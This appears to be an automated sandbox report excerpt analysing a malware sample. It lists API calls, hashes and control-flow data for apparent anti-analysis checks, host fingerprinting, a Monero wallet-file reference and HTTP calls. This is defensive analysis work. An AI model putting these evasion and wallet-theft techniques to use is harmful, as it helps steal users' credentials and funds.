                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess
                                      • String ID: block
                                      • API String ID: 621844428-2199623458
                                      • Opcode ID: 63beb5f56ba4212e74a410d9d7a083f47a3c6391a46d375db38c8b6d9145d286
                                      • Instruction ID: 44ba69410a3eab583aa9e409faabe318e0f2f1150dc2b7d42a535e2bafe4906a
                                      • Opcode Fuzzy Hash: 63beb5f56ba4212e74a410d9d7a083f47a3c6391a46d375db38c8b6d9145d286
                                      • Instruction Fuzzy Hash: 2651F778B58209BBDB14DFA4DA94EAE77B9EF44704F10444BE803AB390E770E941CB61
                                      Function 00AD6C90 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00AD9BB0: GetProcAddress.KERNEL32(76210000,01541698), ref: 00AD9BF1
                                        • Part of subcall function 00AD9BB0: GetProcAddress.KERNEL32(76210000,01541710), ref: 00AD9C0A
                                        • Part of subcall function 00AD9BB0: GetProcAddress.KERNEL32(76210000,01541668), ref: 00AD9C22
                                        • Part of subcall function 00AD9BB0: GetProcAddress.KERNEL32(76210000,01541740), ref: 00AD9C3A
                                        • Part of subcall function 00AD9BB0: GetProcAddress.KERNEL32(76210000,01541788), ref: 00AD9C53
                                        • Part of subcall function 00AD9BB0: GetProcAddress.KERNEL32(76210000,01548A78), ref: 00AD9C6B
                                        • Part of subcall function 00AD9BB0: GetProcAddress.KERNEL32(76210000,01534F88), ref: 00AD9C83
                                        • Part of subcall function 00AD9BB0: GetProcAddress.KERNEL32(76210000,01535308), ref: 00AD9C9C
                                        • Part of subcall function 00AD9BB0: GetProcAddress.KERNEL32(76210000,01541620), ref: 00AD9CB4
                                        • Part of subcall function 00AD9BB0: GetProcAddress.KERNEL32(76210000,01541578), ref: 00AD9CCC
                                        • Part of subcall function 00AD9BB0: GetProcAddress.KERNEL32(76210000,015417A0), ref: 00AD9CE5
                                        • Part of subcall function 00AD9BB0: GetProcAddress.KERNEL32(76210000,015417B8), ref: 00AD9CFD
                                        • Part of subcall function 00AD9BB0: GetProcAddress.KERNEL32(76210000,01535288), ref: 00AD9D15
                                        • Part of subcall function 00AD9BB0: GetProcAddress.KERNEL32(76210000,015415F0), ref: 00AD9D2E
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                        • Part of subcall function 00AC11D0: ExitProcess.KERNEL32 ref: 00AC1211
                                        • Part of subcall function 00AC1160: GetSystemInfo.KERNEL32(?), ref: 00AC116A
                                        • Part of subcall function 00AC1160: ExitProcess.KERNEL32 ref: 00AC117E
                                        • Part of subcall function 00AC1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00AC112B
                                        • Part of subcall function 00AC1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00AC1132
                                        • Part of subcall function 00AC1110: ExitProcess.KERNEL32 ref: 00AC1143
                                        • Part of subcall function 00AC1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00AC123E
                                        • Part of subcall function 00AC1220: __aulldiv.LIBCMT ref: 00AC1258
                                        • Part of subcall function 00AC1220: __aulldiv.LIBCMT ref: 00AC1266
                                        • Part of subcall function 00AC1220: ExitProcess.KERNEL32 ref: 00AC1294
                                        • Part of subcall function 00AD6A10: GetUserDefaultLangID.KERNEL32 ref: 00AD6A14
                                        • Part of subcall function 00AC1190: ExitProcess.KERNEL32 ref: 00AC11C6
                                        • Part of subcall function 00AD79E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00AC11B7), ref: 00AD7A10
                                        • Part of subcall function 00AD79E0: RtlAllocateHeap.NTDLL(00000000), ref: 00AD7A17
                                        • Part of subcall function 00AD79E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00AD7A2F
                                        • Part of subcall function 00AD7A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AD7AA0
                                        • Part of subcall function 00AD7A70: RtlAllocateHeap.NTDLL(00000000), ref: 00AD7AA7
                                        • Part of subcall function 00AD7A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00AD7ABF
                                        • Part of subcall function 00ADACC0: lstrlen.KERNEL32(?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00ADACD5
                                        • Part of subcall function 00ADACC0: lstrcpy.KERNEL32(00000000), ref: 00ADAD14
                                        • Part of subcall function 00ADACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00ADAD22
                                        • Part of subcall function 00ADABB0: lstrcpy.KERNEL32(?,00AE0E1A), ref: 00ADAC15
                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01548A48,?,00AE10F4,?,00000000,?,00AE10F8,?,00000000,00AE0AF3), ref: 00AD6D6A
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00AD6D88
                                      • CloseHandle.KERNEL32(00000000), ref: 00AD6D99
                                      • Sleep.KERNEL32(00001770), ref: 00AD6DA4
                                      • CloseHandle.KERNEL32(?,00000000,?,01548A48,?,00AE10F4,?,00000000,?,00AE10F8,?,00000000,00AE0AF3), ref: 00AD6DBA
                                      • ExitProcess.KERNEL32 ref: 00AD6DC2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                      • String ID:
                                      • API String ID: 2525456742-0
                                      • Opcode ID: ffcdfad232bfb60ef541e0267271994a873507df36029fbba972c33e28bd35eb
                                      • Instruction ID: 573756660d474a8807717ba81f7cf1fcc681b5b04999aa18afe95d31913c2300
                                      • Opcode Fuzzy Hash: ffcdfad232bfb60ef541e0267271994a873507df36029fbba972c33e28bd35eb
                                      • Instruction Fuzzy Hash: EA310871A14208ABCB04FBF0DE66BEE7379AF24340F50091BF153A6392DF746A058666
                                      Function 00AC1220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1436 ac1220-ac1247 call ad8b40 GlobalMemoryStatusEx 1439 ac1249-ac1271 call addd30 * 2 1436->1439 1440 ac1273-ac127a 1436->1440 1441 ac1281-ac1285 1439->1441 1440->1441 1443 ac129a-ac129d 1441->1443 1444 ac1287 1441->1444 1446 ac1289-ac1290 1444->1446 1447 ac1292-ac1294 ExitProcess 1444->1447 1446->1443 1446->1447
                                      APIs
                                      • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00AC123E
                                      • __aulldiv.LIBCMT ref: 00AC1258
                                      • __aulldiv.LIBCMT ref: 00AC1266
                                      • ExitProcess.KERNEL32 ref: 00AC1294
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                      • String ID: @
                                      • API String ID: 3404098578-2766056989
                                      • Opcode ID: 81ee7bde09a5fa6b3dfdcdb7f81886c7f23bab0abb9ad2765df72d398d59b871
                                      • Instruction ID: 4d9f1a438ed74212be98532f7cdeab983f4766531c5d478d27a46ff8d7521fc7
                                      • Opcode Fuzzy Hash: 81ee7bde09a5fa6b3dfdcdb7f81886c7f23bab0abb9ad2765df72d398d59b871
                                      • Instruction Fuzzy Hash: 33016DB0E40308FBEF10EFE4CD4AFEEBBB8AB15705F20845AE605B62C1D67455418769
                                      Function 00AD6D93 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1450 ad6d93 1451 ad6daa 1450->1451 1453 ad6dac-ad6dc2 call ad6bc0 call ad5d60 CloseHandle ExitProcess 1451->1453 1454 ad6d5a-ad6d77 call adade0 OpenEventA 1451->1454 1460 ad6d79-ad6d91 call adade0 CreateEventA 1454->1460 1461 ad6d95-ad6da4 CloseHandle Sleep 1454->1461 1460->1453 1461->1451
                                      APIs
                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01548A48,?,00AE10F4,?,00000000,?,00AE10F8,?,00000000,00AE0AF3), ref: 00AD6D6A
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00AD6D88
                                      • CloseHandle.KERNEL32(00000000), ref: 00AD6D99
                                      • Sleep.KERNEL32(00001770), ref: 00AD6DA4
                                      • CloseHandle.KERNEL32(?,00000000,?,01548A48,?,00AE10F4,?,00000000,?,00AE10F8,?,00000000,00AE0AF3), ref: 00AD6DBA
                                      • ExitProcess.KERNEL32 ref: 00AD6DC2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                      • String ID:
                                      • API String ID: 941982115-0
                                      • Opcode ID: 2ffa3fad0b56e06befdc363524d758bb5523ddb27bb89babdd92deb252f5da97
                                      • Instruction ID: 3453826f5859ae1f6f10c975b5cd4cdd87c8876846c4b6f57ed9961cb0243767
                                      • Opcode Fuzzy Hash: 2ffa3fad0b56e06befdc363524d758bb5523ddb27bb89babdd92deb252f5da97
                                      • Instruction Fuzzy Hash: 27F0F830A58709ABEB10ABA0ED0ABBE7776AF24702F100517B593A5391DBB05600CA69
                                      Function 00AC4800 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00AC4889
                                      • InternetCrackUrlA.WININET(00000000,00000000), ref: 00AC4899
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CrackInternetlstrlen
                                      • String ID: <
                                      • API String ID: 1274457161-4251816714
                                      • Opcode ID: 1ca140350179ffc4cde3a1fcf180e9c624c5ef68cad7e897fc233dbd69af5dd2
                                      • Instruction ID: 56af4c71c37868d74a1a9893a6530fa61e8a812a3c12d84724a50cb226f2cf39
                                      • Opcode Fuzzy Hash: 1ca140350179ffc4cde3a1fcf180e9c624c5ef68cad7e897fc233dbd69af5dd2
                                      • Instruction Fuzzy Hash: 0F213EB5D00209ABDF14DFA4E845BDE7B75FB45320F108625F955A72C0EB706A09CB91
                                      Function 00AD5440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00ADAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00ADAAF6
                                        • Part of subcall function 00AC62D0: InternetOpenA.WININET(00AE0DFF,00000001,00000000,00000000,00000000), ref: 00AC6331
                                        • Part of subcall function 00AC62D0: StrCmpCA.SHLWAPI(?,0154FCB0), ref: 00AC6353
                                        • Part of subcall function 00AC62D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00AC6385
                                        • Part of subcall function 00AC62D0: HttpOpenRequestA.WININET(00000000,GET,?,0154F530,00000000,00000000,00400100,00000000), ref: 00AC63D5
                                        • Part of subcall function 00AC62D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00AC640F
                                        • Part of subcall function 00AC62D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00AC6421
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00AD5478
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                      • String ID: ERROR$ERROR
                                      • API String ID: 3287882509-2579291623
                                      • Opcode ID: 0bdb80433c872e72b6b2ed0ecc0e5e4a64aee8495b217d0e3696251196042d2f
                                      • Instruction ID: 7d165789e18db9f82a98a8472fe31f571957a9b11eda43f8e1c1925f054c39ce
                                      • Opcode Fuzzy Hash: 0bdb80433c872e72b6b2ed0ecc0e5e4a64aee8495b217d0e3696251196042d2f
                                      • Instruction Fuzzy Hash: 1D111670910108ABCB14FF74DE56EED7379AF60340F40455AF91B576A2EF30AB05C651
                                      Function 00AD7A70 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AD7AA0
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00AD7AA7
                                      • GetComputerNameA.KERNEL32(?,00000104), ref: 00AD7ABF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateComputerNameProcess
                                      • String ID:
                                      • API String ID: 1664310425-0
                                      • Opcode ID: a1f52e3e97bdb9243112a08b89766c319fd2d85197aaf43c0aa88572e393a813
                                      • Instruction ID: 158b348193bb341adb0d1155944364e80a546ee0245531cf5dbcf3433b7b6100
                                      • Opcode Fuzzy Hash: a1f52e3e97bdb9243112a08b89766c319fd2d85197aaf43c0aa88572e393a813
                                      • Instruction Fuzzy Hash: B60186B1958349ABC704DF99DD45FAEBBB8F704B55F10015BF506E3390E7B45A0087A1
                                      Function 00AC1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00AC112B
                                      • VirtualAllocExNuma.KERNEL32(00000000), ref: 00AC1132
                                      • ExitProcess.KERNEL32 ref: 00AC1143
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$AllocCurrentExitNumaVirtual
                                      • String ID:
                                      • API String ID: 1103761159-0
                                      • Opcode ID: ab51cf51b5cd380ba1136296c0aba5a50486b3a56be099ee51682b34c4e79c2b
                                      • Instruction ID: f9f79a010882ce44d30cdafcf21e955bfaf27d122c6cf6e7a266d6af4f2d6567
                                      • Opcode Fuzzy Hash: ab51cf51b5cd380ba1136296c0aba5a50486b3a56be099ee51682b34c4e79c2b
                                      • Instruction Fuzzy Hash: E6E0E670B59308FBE7105B909D0AF4D76689B05B15F10015AF709B62D1C6B56540566D
                                      Function 00AC10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00AC10B3
                                      • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00AC10F7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
